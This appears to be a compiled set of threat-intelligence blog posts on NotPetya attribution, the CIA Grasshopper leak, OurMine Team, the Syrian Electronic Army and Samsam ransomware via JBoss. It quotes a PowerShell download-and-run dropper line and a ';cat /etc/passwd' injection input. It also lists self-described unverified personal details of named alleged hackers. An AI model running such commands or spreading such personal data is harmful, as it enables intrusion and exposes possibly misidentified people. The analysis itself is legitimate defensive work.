NotPetya 2– Telebotz Attribution

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case For Nation State Attribution
Jonathan Nichols
04 JULY 2017

Executive Summary

Compelling data has been collected which demonstrates that the actor group Telebotz (Sandworm, Energetic Bear, or BlackEnergy) is behind the #NotPetya (Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C) attack.


Analysts at ESET have painted a compelling picture which demonstrates that the #NotPetya attacks were conducted by the same actors behind the DarkEnergy attacks against the Ukrainian power grid. This analysis uses inductive reasoning and probability to paint a compelling picture. The similarities between the DarkEnergy actors and the NotPetya actors are uncanny to such a degree that it is unlikely that any other actor group could have, accidentally or intentionally, conducted the attack with such striking similarity.

Yesterday I wrote a blog post detailing how public details of the NotPetya attack were not sufficient to point to an APT. Those facts have changed as of today, July 4th, ESET has published a fantastic report which should remove all but the most cynical of skpetics. Telebotz did NotPetya.

A Note on Terminology

The Information Security industry has a problem with terminology. Attackers, Viruses, and methodologies are frequently given different names by each industry group as these defenders vie for supremacy in marketing wars. This is an unfortunate state of affairs. Alas, until a NIST standard exists for uniform adversary naming, we must live in the world we’ve got, not the one we wish to inhabit (But seriously NIST, you’re dropping the ball here). For this report, I am calling this specific attack “NotPetya” to be in line with the most important policy authorities I wish this report to reach (NATO) and I’m labeling the actors “Telebots” to be in line with the analysts who conducted the bulk of the research I will be drawing on for this report. In an attempt to be exhaustive (and in a shameless grab at Search Engine Optimization), here is a current list of known industry names for the attackers and the methodologies:

NotPetya: Petya, exPetya, ExPetr, GoldenEye, Nyetya, Diskcoder.C

Telebots: Sandworm, Energetic Bear*, BlackEnergy*

(*source documents vary on whether Telebots/Sandworm are closely related or identical to the BlackEnergy/Energetic Bear group)

A Note on Analysis

It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Due to this immutable fact, it is always good to start with the premise that the hacker you’re analyzing is an idiot. When facts demonstrate this premise to be false, revise the analysis up the food chain until you’ve found a sufficiently complex level of capability to fit the facts. To do otherwise invites trouble for the analyst and the organizations they support. Since all attacks done by idiots can also be done by experts, any analysis which presupposes that the attackers are experts becomes fallacious on its face. You cannot DISPROVE an attack was done by a professional, you can only prove that a professional must have done an attack. A begets B, but B does not always beget A.


Timeline of Events

December 2015 BlackEnergy (related to Telebotz) disrupts Ukrainian power grid
December 2016 KillDisk malware against Ukrainian financials, first instance of fake ransomware use by Telebotz to mask a wiper
January 2017 First instance of VPN tunnels used to spread botnet
January? 2017 Telebot incorporate password stealer, Mimikatz, and PsExec
14March 09:30 2017 PetrWrap (Filecoder.NKH) report from Kaspersky. Uses nearly identical ransom screen
14April 2017 Backdoor ZvitPublishedObject.dll in MeDoc Update owned by Telebots
24APR-10MAY 2017 No known backdoors present in MeDoc
15May 2017 New Backdoor compiled (Filecoder.AESNI.C aka XData)
15May 2017 Backdoor ZvitPublishedObject.dll in MeDoc Update owned by Telebots
17May-21June 2017 No known backdoors present in MeDoc
18May 2017 Publish of Filecoder.AESNI.C (few infections due to lack of backdoor)
22June 2017 New Backdoor compiled? (wording unclear)
22June 2017 Backdoor ZvitPublishedObject.dll in MeDoc Update owned by Telebots
27June 10:30 UTC 2017 MEDoc update spreads NotPetya (Discoder.C)


The timeline above demonstrates a clear evolution in capabilities from early 2016 until today. Early on, Telebotz is overserved developing the techniques to use fake ransomware to hide a wiper. They then develop the techniques to spread their viruses over VPN tunnels, incorporate password stealers, Mimikatz, PsExec, and compromise the MeDocs Update process. All of these techniques are present in the NotPetya attack.

Finding one such technique used by a separate hacking group would be a case of correlation. Finding two would be lucky. Finding so many correlating techniques which fit into a timeline that demonstrates a clear evolution in capabilities? Nature is rarely so beautiful as to grace humanity with that level of coincidence.

As this report was being written, the Ukrainian Cyber Police came to the same conclusion. Like me, they borrow heavily from the wonderful work of the people at ESET. (Source:

If you see ESET at a conference, be sure to buy them a beer and thank them for their service to the Western world.


NOTE: I’m doing this on my own free time and without assistance. Please forgive and alert me to any errors, both factual and editorial. If you want a Threat Intelligence analyst on your team, just drop me a line. I would have been happy to have shared this work with a team, with an editor, and under the banner of a team logo.


NotPetya – So Easy Anyone Could Do It

This work was done in my free time with my own resources. Imagine what we could do with a team!

The Case Against Nation State Attribution
Jonathan Nichols
03 JULY 2017

“Never attribute to malice that which is adequately explained by stupidity”Hanlon’s Razor

Executive Summary

The NATO Cooperative Cyber Defence Center of Excellence states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. To date, the principal compelling reason for security researchers to believe that the NotPetya attacks were conducted by a nation state relates to the use of M.E.Doc automatic software updates in order to seed the NotPetya virus. Outside of this element, researchers have demonstrated multiple elements of this attack which are amateurish, or otherwise unlike behavior typically seen in nation state level threats. New evidence suggests that the malicious abuse of M.E.Doc would be trivial for non-state actors. This report attempts to review NATO’s claim that the attacks are likely to be attributed to a nation state actor by tackling the known public evidence about each of these attack vectors. While many of NATO’s claims are disputed by community experts, the claims are taken here with the seriousness one should give an entity that could trigger Article 5 (war).

NATO Claim – Drive by, Software Updates, and Phishing

The NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) states that the “global outbreak of NotPetya malware on 27 June 2017 […] can most likely be attributed to a state actor.” (Source: The CCD COE report of 30 June 2017 cites the attack as “complex and expensive enough” to not have been a non-state actor, and that the ransom collected would have not covered the cost of the operation.

NATO states that the NotPetya malware spread through drive-by exploits, compromised software updates, and email phishing attacks. Of these attack vectors, most security researchers highlight the compromised software updates as being evidence of nation state involvement.

Compromised Software Updates – So Easy Anyone Could Do It

Ukrainian Cyber Police have published that at about 10:30 am GMT Tuesday (27 July 2017) M.E.Doc software on client machines ran a routine automatic update. At that time, the service EZVit.exe connected to address with User Agent “medoc1001189” and downloaded 333 kilobytes of data (Source: This event was the initial virus download.


Further analysis of show that, at the time of this writing (03 JULY 2017 at 0948 EST) the server at has the following services open:

Port 21 – ProFTPD Version 1.3.4c
Port 22 – OpenSSH Version 5.4p1
Port 80 – ngnix Version 1.2.7


Notably, this ProFTPD software is vulnerable to CVE-2015-3306 which allows for trivial exploitation to read and write files to the hard drive. (source: This exploit is also a Metasploit module. Further testing or forensics would be necessary to ensure that this was the vulnerability used, and this analysis is not attempting to claim with any certainty that CVE-2015-3306 was definitively the malicious attack vector. Nonethless, the trivial nature of this attack is such that any hacker with rudimentary capabilities could exploit it if the mod_copy was enabled. With trivial access to write to the hard drive, a rudimentary hacker could re-write files without difficulty.

The potentiality for trivial attacks is not limited just to this exploit. Multiple exploits exist for all of these services, and any number of them could have been used by non-state actors with little to no experience in hacking. The publicly known vulnerabilities for the open ports are as follows:

Getting the Clients to Download the Virus

In the course of this investigation, it was discovered that simply sending an HTTP GET request to on port 80 with the User Agent “medoc1001189” will result in the server sending a “download” file. This strongly suggests that no authentication was/is required by M.E.Doc software to receive updates. It is probable that any file downloaded in this manner will be executed by the M.E.Doc auto-updater. In this manner, simply writing a virus to the download file may result in the execution of the virus on any M.E.Doc client machine.

Compromised Software Updates – Conclusion

The attack, as described by security researchers, NATO, and Ukrainian Cyber Police, is not sufficiently complex to have necessarily been conducted by a nation state actor. To the contrary, the techniques described above use tools standard in Kali Linux, a free operating system favored as an introductory hacker toolkit.

Drive-by Attack

The Drive-by attack described by NATO CCD COE best matches the description of NotPetya being delivered via a fake Microsoft Windows update pop up on (Source: While some security experts disagree, the website owners themselves have stated that the website utilized a malicious pop-up ( Pop ups are routinely blocked by most modern browsers and are not the preferred infection vector for advanced drive-by actors. Further, fake Windows updates in pop-up browser windows is behavior not typically associated with the advanced actors. This behavior is usually observed in actors with a criminal motive in malvertising campaigns which tend to target illicit video streaming services. Advanced actors would likely attempt more successful browser infections, and would resist the use of this type of pop up. This attack, like the software update attack, betrays the work of an unskilled hacker, and not the work of a nation state.


The Phishing attack described by the NATO CCD COE best matches the description of phishing emails delivering the NotPetya virus through a Word document attachment (Source: Again, some security experts dispute this claim ( Taking NATO at their word, this attack appears to use Order-20062017.doc to leverage CVE-2017-0199, which calls the following Powershell “PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://’, ‘C:\Documents and Settings\Administrator\Application Data\[random_number.exe’);”

Researchers have complained that this research is not replicatable. This is potentially because is no longer accessible. As of this writing, respectable research organizations such as Booz Allen Hamilton ( assess myguy.exe to be a potential dropper for NotPetya. Should this analysis change, it only reduces the complexity of the NotPetya attack. A reduction in complexity will only further reduce the probability that the attack is the work of a nation state.

Regardless, the threattracksecurity report is the only professional report which matches the details of the NATO CCD COE report. Threattracksecurity has published the following phishing email:

“TO: target.emailName

ATTACHMENT: Order-20062017.doc

Hello target.emailName,
You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is ex. 6089, 6088

With appreciation!

This phishing email is rudimentary, at best. There are no hallmarks here of advanced phishing techniques, and no indication that the email specifically targeted any user. To the contrary, the use of automated variables is indicative of a rudimentary hacker and betrays none of the qualities expected from nation state level adversaries.

The NotPetya Virus – Malice or Idiocy?

Much has been made about the fact that the NotPetya virus appears to have been designed as a wiper, and not as a genuine piece of ransomware. The virus also checks for avp.exe (Kaspersky Antivirus) and then wipes the bootsector of any device with the file present. (Source:  In the course of running, the virus wipes the Master Boot Record, reboots the machine, encrypts the machine, writes a decryption key to readme.txt file on the C drive, then displays a ransom message.

The ransom message itself contains a decryption key which is entirely randomly generated and not the encryption key created in readme.txt! The virus either accidentally or maliciously writes over its own ability to decrypt itself. This behavior is being attributed to malice on part of the designer. However, what has been attributed to malice could just as easily be attributed to poor coding. Why would a coder write one ransom message and decryption key to readme.txt and then generate a random fake decryption key for an entirely new ransom message to be displayed to the user? This duplication of effort is not the sign of a professional nation state adversary. It is entirely plausible, and within the confines of Hanlon’s Razor, that the actors are so amateur as to not to know the ransomware module they used already wrote a ransom message to readme.txt. Further, the specific targeting of Kaspersky Antivirus hearkens back to the vindictive nature of low level cyber criminals, such as those which famously write hate messages to Kaspersky and Brian Krebs regularly.

$10,000 – Not Enough Cash to be Worth the Effort?

As of this writing, the Bitcoin wallet used for this attack contains $10,092.15, or 3.99 BTC at the current exchange rate (Source: While this is not a significant windfall for nation state actors, it would be a sizable return for an actor observed using only a few days’ worth of effort and a handful of known vulnerabilities. Without evidence of sufficient technical complexity, it seems inappropriate to assess $10,000 for a weekend’s worth of work as “Not worth it” to any moderately capable individual or small group. This is especially true if the actor comes from a country with a low GDP.


There is not sufficient evidence in the current publicly available corpus of knowledge to state that this attack must have been conducted by a nation state actor. No publicly known data point demonstrates a demand for skills above those of a 400 lb hacker with a small amount of cash and a copy of Kali Linux.

However, the inability to find data which confirms that the attack was necessarily a nation state does not preclude the possibility that the attack was a nation state. It is relatively simple for a complex adversary to pretend to be an idiot, and it is impossible for an idiot to pretend to be a complex adversary. Complexity in future reports may, over time and with more robust forensics, demonstrate that this was an APT. However, at this time, there is not sufficient public data to prove that is the case.

Stories are running rampant that NATO is debating whether to consider this attack and act of war. (Source: We should urge moderation and accuracy in our analysis. I, for one, have a distaste for wars started on faulty premises.

-Jon (@WvuAlphaSoldier)

NOTE: I’m doing this on my own free time and without assistance. Please forgive and alert me to any errors, both factual and editorial. If you want a Threat Intelligence analyst on your team, just drop me a line. I would have been happy to have shared this work with a team, with an editor, and under the banner of a team logo.

BONUS FLOW CHART! (Seriously, I need a copy of Visio….)


What is Grasshopper? -A Wikileaks Vault7 Story

It’s that time again. Wikileaks has published another set of documents allegedly stolen from the CIA. This time, the documents detail the use of a tool named Grasshopper. Lets try to get ahead of the media cycle and explain, in plain English, what Grasshopper is.

“Grasshopper appears to be a .exe builder which simplifies the process of identifying and deploying malicious code on a target machine.”


What does that mean? Essentially, Grasshopper automates the process of developing an executable file which will run on a victim machine. This isn’t special. Any child hacker will know that Metasploit will do this for you, for free, without having to join the CIA or anything! If you’re so inclined, you can totally pretend you’re a superspy, here:

Building an executable by hand is tough, but with an executable builder, it’s super easy! Just pick the victim from a list, identify what is running on the victim machine, and a menu will guide you through the process of identifying the right Vulnerabilities, Exploits, and Payloads you can use against that machine. It’s Hacking for Dummies! No more messy “learning how to code” needed!

To go into detail, we gotta get technical. I have to explain to you a bit about the fundamentals of malware. For malware to work, you need to have a Vulnerability, an Exploit, and a Payload.

Vulnerability: A flaw in a piece of code. These are usually accidentally introduced by programmers. After one too many late night coding sections, a coder inadvertently misplaces a semi-colon, or forgets to sanitize a user input. Lets say a programmer for some server made a user login page without any basic sanity checks and it looks kinda like this:

Technical bits:

(Note to coders: I know! Don’t write me. Trying to keep this basic.)

Exploit: This is the code that leverages the vulnerability. Lets look at the above function. A hacker may write a script that takes advantage of the lack of input sanitation. Instead of entering the user name, the hacker may write something like ;cat /etc/passwd. Let me break it down:

Technical bits:
; = “ESCAPE!”
cat = “DISPLAY”
/etc/passwd = “the file containing all the passwords for this machine.”

So when that UserInput function above is ran….the computer sees:

Next thing you know, the hacker has your password file.

This is the part that most people traditionally think of as “malware.” This could be nearly anything, and is somewhat dependent on the type of vulnerability. A vulnerability which allows for root level remote code execution can run most anything, a vulnerability which only allows a hacker to read the contents of memory won’t allow for any code execution. If the vulnerability allows for local code execution, you can execute the payload locally (while sitting at the machine). If the vulnerability allows for remote code execution, you can run the payload remotely against the vulnerable machine sitting on the internet. A hacker’s payload could be wipers (things that erase a hard drive, like what the Iranians have been deploying against the Saudis), ransomware (famously being deployed against hospitals), trojans (used to allow a hacker to gain remote access), keyloggers (usually deployed by parents or jealous former lovers), or even just everyday spambots (used to try to sell you garbage).


1) Apply at
2) Go through years of rigorous training
3) Pass an insane background check
4) Get specialized training for Grasshopper
5) Deploy to a crappy part of the world
6) Find a target machine
7) Identify what is running on that machine
8) Using a set of easily navigated menus, use Grasshopper to select what type of Windows machine the victim has, then select a vulnerability likely to work against the victim, then select what kind of payload you want to run on the machine. Save a copy of Totally_Not_Spying.exe
9) Sneak in and run Totally_Not_Spying.exe on the target machine
10) Try to escape without getting charged for espionage and beheaded by some cut-rate dictator

OR….just watch this Youtube video:

That’s right kids! All the functionality Wikileaks just told you the CIA has…..yep…you have it to. Just download Metasploit and follow one of the innumerable guides posted on YouTube and, just like that, you’ve skipped all that difficult polygraph stuff the CIA would have made you do!

A note on Wikileaks

Thus far, Wikileaks’ #Vault7 dumps have failed to impress. No one should be surprised that the CIA hacks targets. Most Americans would rightly be upset if the CIA stayed in the stone age.

I continue to wait for Wikileaks to demonstrate something spectacular. Do they have evidence that the CIA engages in bulk data collection? Do they have evidence that the CIA has been holding onto critical bugs (like a heartbleed level vulnerability?) No? Or maybe they do, but haven’t published it yet. THOSE would be notable. To date, Wikileaks has only demonstrated that spies sometimes spy. This isn’t remarkable, and neither are the techniques they’ve demonstrated, to date.

Until next time! Bye for now!

-Jonathan Nichols

Our Mine Team

(Originally Authored on July 27th, 2016)

Much media has been attention to “OurMine Team” a group of hackers who have been on a recent hacking spree of high profile accounts. Those attacked include Daniel Ek, (CEO of Spotify), Mark Zuckerberg, Channing Tatum, former Twitter CEOs Dick Costolo and Ev Williams, Twitter co-founder Biz Stone, and YouTubers Pewdiepie, Merkiplier, Dadmau5, and David Guetta. The group claims to be security researchers who are hacking these accounts to demonstrate vulnerabilities. The group has setup a website at which sell services for $30 to $5,000.

This group is well known to researchers. The group was founded in 2014 as a group of low level Saudi Arabian hackers playing on the OurMine Minecraft forums. The group gained attention in July, 2015 when they conducted DDoS attacks against a number of financial intuitions. Before then, @Our_Mine was known for taking over the accounts of gamers, stealing over 2,000 Euros worth of PS4 FIFA coins (used for in-game purchases). The group is believed to be relatively unskilled. In 2015, the group was observed on attempting to pay for Instagram account takeovers. The group is believed to likely be using off the shelf low level hacking tools in their attacks.

The group also has a “theme song” of considerable production quality, which can be found here: The song appears to have been sung by Lindee Link, a song writer from Georgia, USA.

The following is unverified PII for the OneMine Team

Related Accounts: // // //

Member: Snake

Name: Abdulhakeem Zatar





Whois information: Admin Name: OurMine Snake

Member: A_Body

Name : Alsheikh Ahmed

Google+ :

Email :

Skype : Alsheikh.Ahmed3

Location : Saudi Arabia

Facebook : /alsheikh.ahmed.3

Website :

Member: Makki

Name : Ahmad Makki

Skype :  a.m.bukari

Location : Saudi Arabia

Instagram : @0AhmadMakki0

Facebook : /ahmad.adnan.3990

Phone : +966.0540087109

Email :

Related websites

Related Pastebin entries:

Additional Sources:

The Syrian Electronic Army Timeline You Wish You Had

(Originally Created in 2013)

Timeline of Events

25NOV09 – The first instance of a defacement by SyRiAn_34G13, the future administrator of the SEA’s website.

19APR10 – First instance of Th3 Pr0 hacking with T34M Err0r

25DEC10 – First instance of Reza_0o0, an Iranian hacker who may have assisted with the early development of the SEA

APR11 – created

24APR11 – Th3 Pr0 conducts an interview with Tartous2day.com28

05MAY11 – registered

07MAY11 – “under construction”

11MAY11 – First post on

11MAY11 – First YouTube video, “Directed by Ibrahem Melhem”

12MAY11 – First attack claim on

13MAY11 – Iranian hacker “Reza_0o0” defaces websites which are re-defaced by SEA weeks later

17MAY11 – The SEA claims over 50 websites “attacked” with DDoS or defacement

18MAY11 – Development of Syrian Hacker School at 22MAY11 – Interview with SEA leader on Syrian television

27MAY11 – @SyrianSoldier1 becomes the official SEA Twitter handle

MAY11 – Th3 Pr0 and AKA Dr. Hana Noura claim attack on

MAY11 – Th3 Pr0 and SaQer SyRia claim attack on

MAY11 – ArabAttack claims defacement at and

MAY11 – SY Team claims defacement at

30MAY11 – publishes a report on SEA

04JUN11 – 122 domains hacked. Note: Mass defacements are conducted

04JUN11 – Re-defacements of websites hacked by Reza_0o0 on 13MAY11

04JUN11 – 6 “top Israeli websites” hacked (they were not significant websites) for “Naksa Day”

07JUN11 – Israeli websites defaced and server data deleted “as a revenge from Facebook which keeps removing our pages”

12JUN11 – SEA claims hacks on two more Israeli websites

15JUN11 – SEA claims hack on Center for Small Business in Israel

19JUN11 – Israeli Chemical Society Hack

20JUN11 – Syrian President Bashar al-Assad recognizes SEA in a speech

20JUN11 – SEA begins compromising anti-regime Facebook pages (17 compromises as of 23JUN)

24JUN11 – SEA hacks the French embassy in Damascus. The website redirects to

25JUN11 – 10 Israeli websites hacked by SEA

11JUL11 – Haidara Suleiman, the son of a Syrian intelligence officer, identifies himself as a member of the SEA

15JUL11 – First instance of found on

26SEP11 – SEA hacks Harvard University’s home page. This attack is frequently cited by Western media sources as “the first hack” conducted by the group.

30JAN12 – SEA hacks Al Jazeera

26APR12 – SEA hacks LinkedIn blog

05JUL12 – SEA hacks @AJStream

03AUG12 – SEA hacks Reuters Twitter and blog

05SEP12 – SEA sends fake SMS messages from Al-Jazeera feed

09JAN13 – SEA hacks Saudi Arabian Defense website

05FEB13 – SEA hacks Haaretz email server

05FEB13 – SEA hacks Israeli Ministry of Transportation

07FEB13 – SEA hacks Sky News Arabia Twitter and Facebook accounts 27FEB13 – SEA hacks Agence France Presse

02MAR13 – SEA hacks Qatar Foundation Twitter and Facebook accounts 05MAR13 – SEA hacks France 24 news site and Twitter feed

08MAR13 – SEA provides interview to E-HackNews

18MAR13 – SEA hacks Human Rights Watch Twitter and web site

22MAR13 – SEA hacks BBC Twitter Account

16APR13 – SEA hacks NPR

23APR13 – SEA hacks AP Twitter feed, causing stock market drop

29APR13 – SEA hacks 11 Guardian Twitter accounts

02MAY13 – SEA Twitter account purportedly hacked by AnonymousOwn3r

05MAY13 – E! Online hacked by SEA

06MAY13 – SEA hacks The Onion

17MAY13 – SEA hacks Financial Times Twitter Account and Blog

19MAY13 – SEA claims hack of Saudi Arabian Ministry of Defense e-mail system

21MAY13 – SEA hacks Daily Telegraph

25MAY13 – SEA hacks ITV

26MAY13 – SEA hacks Sky News

31MAY13 – ISP for SEA website takes website offline

03JUN13 – SEA hacks Saudi Arabian newspaper Sabq

04JUN13 – SEA hacks Turkish Ministry of Interior

02JUL13 – SEA website returns

17JUL13 – SEA hacks TrueCaller; the attack is believed to have been launched to disrupt rebel communications in Syria

21JUL13 – SEA hacks TangoMe; the attack is believed to have been launched to disrupt rebel communications in Syria

23JUL13 – SEA hacks DailyDot

23JUL13 – SEA hacks Viber; the attack is believed to have been launched to disrupt rebel communications in Syria

29JUL13 – SEA hacks

01AUG13 – SEA threatens Twitter

16AUG13 – SEA hacks Outbrain; numerous news websites affected

22AUG13 – SEA hacks ShareThis

27AUG13 – SEA hacks MelbourneIT, takes ownership of New York Times, Huffington Post, and Twitter DNS entries.

31AUG13 – SEA VPS data leaked on Tor darkweb

03SEP13 – SEA hacks


Some Extra Details on Hospital Ransomware You (Probably) Didn’t Know

(Originally Authored March 31st, 2016)

Greeting internet! I’m here to tell you the story of hospital ransomware, Samsam.exe, and the latest vulnerability which should have everyone running to patch their enterprise systems.

Tl;dr – Jboss is vulnerable and is being actively exploited. Patch it or get infected with ransomware. After you fix that, search for everything that uses the commons-collection Java object and make sure it isn’t vulnerable to the same crap. Many products use commons-collection, and while they may not be being targeted now, they will be!

We were warned. We didn’t listen.

On January 28th, 2015, AppSecCali presenters Gabriel Lawrence (@gebl) and Chris Frohoff (@frohoff) presented a talk titled “Marshalling Pickles” which details “how deserializing objects can ruin your day[1].” Deserialization (or Unserialization) is a vulnerability class which takes advantage of how object serialization works in a programming language. Serialization is the process of converting complex data structures into another format (usually binary) for transfer over a network.

Vulnerabilities exist when developers accept serialized data and attempt to deserialize it inside a program. The AppSecCali team demonstrated proofs of concept and released the ysoserial.jar[2].

On November 10th, 2015, Oracle released CVE-2015-4852. Their alert page shows that the vulnerability allows remote code execution without authentication on Oracle WebLogic Servers[3]. While that’s bad enough to warrant serious research, it got worse. On November 6, 2015, Foxglove Security published a blog titled “What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability[4]”. As it turns out, the vulnerability wasn’t just in WebLogic, but could be exploited in a large number of enterprise systems. The vulnerability is in the commons-collection Java library. This prompted a slew of organizations to issue alerts, with CVEs continuing to be pushed out regularly.

While the ysoserial.jar file was successful in proving the exploit, it was still technically difficult to use. A user with sufficient knowledge in payload generation, Burp Suite, and coding could pull it off, but it remained out of the hands of skiddies. Or it did, until on November 18t, 2015, Trust Foundry researcher Nick Fox released the Java Deserialization Exploit[5]. With this tool and very little knowledge, attacking vulnerable JBoss servers was as easy as LOIC.

With JBossExploit.jar and Shodan in hand, exploiting JBoss instances became trivially easy to pull off. While Trust Foundry demonstrated the attack with a reverse tcp shell, other hackers had bigger dreams.


Enter Samsam.exe

On December 20th, 2015, Peter Kline informed the world that he was working he had a client with a new virus, samsam.exe. The virus had spread through the whole network, encrypting files as it went using the Windows Cryptography API[6]. The earliest non-public instance this researcher has dates back to December 04, 2015, and we were off to the races. Researchers began seeing an attack pattern take shape. As emails and incident response reports were being passed around the community, the story finally broke. On February 12, 2016, NBC Los Angeles reported that the Hollywood Presbyterian Hospital had been hit with ransomware. With media pressure now on, teams moved quickly to respond. On February 18, 2015 the FBI issued a TLP:Green FLASH document identifying samsam as MSIL/Samas.A (AKA Gen.Variant.Kazy or RDN/Ransom).

“After an initial compromise, attackers map, connect to, and infect hosts on the network using several uploaded files. […] The actor(s) then distribute the malware to each host in the network using a copy of Microsoft’s psexec.exe.”

On March 24th, the MS-ISAC alerted the public that Jboss/Wildfly was linked to ransomware infections.


So What?
Here are the takeaways:

  • Lazy Incident Response is Lazy! – 99% of the media stories you have read regarding the hospital ransomware attacks have been wrong. The attacks, largely, are not coming in through phishing or drive-by attacks as you’ve been led to believe. They are coming in through this jboss vulnerability.
  • We Aren’t Done Here – Now that the story is finally public enough for system administrators to realize the Jboss vulnerability, there are still thousands of programs out there using the underlying vulnerable commons-collection objects. Jboss may be getting patched, but if we’re only patching Jboss, then we’re not seeing the forest for the trees!
  • Hospitals Aren’t The Only Problem – While hospital attacks have been making the news, they are a symptom, not the problem. Focusing only on the hospitals is causing the industry to lose focus on the larger issue! Many enterprise systems use Jboss. All of them are vulnerable to the Jboss / Ransomware double header. While you are reading about hospitals in the news, the actual target list has includes schools, governments, mass transit systems, and any number of other systems we simply haven’t identified yet.
  • NDAs Suck – In this incident, the pieces were there to put together from the minute the attacks started. NDAs and the lack of communication between groups attempting to solve this problem have allowed the problem to grow, have stifled progress in mitigating the issue, and have resulted in multiple media outlets misreporting the attacks. Poor users are being forced to attend spear-phishing classes while 3rd party vendors continue to deploy vulnerable jboss instances inside some of our most trusted networks. If we want to get a handle on this, we need to work together. For every incident being reported on publicly, there are many organizations which are hiding the fact that they were attacked from the public. The issue is larger than you’ve been led to believe, it affects more than you were told it did, and it had nothing to do with phishing. The sooner we collectively attack this thing, the sooner we can go back to sipping beers at DEFCON.

Technical Details

There are brilliant technical write-ups being done on this issue, and replicating the hashes and malware analysis already out there isn’t what we’re aiming to do here. For technical details, including snort rules and other things an incident response or IT manager may need, please review the FBI Flash MC-000068-MW at The Talos team has also pushed a write-up chalk full of technical details, here: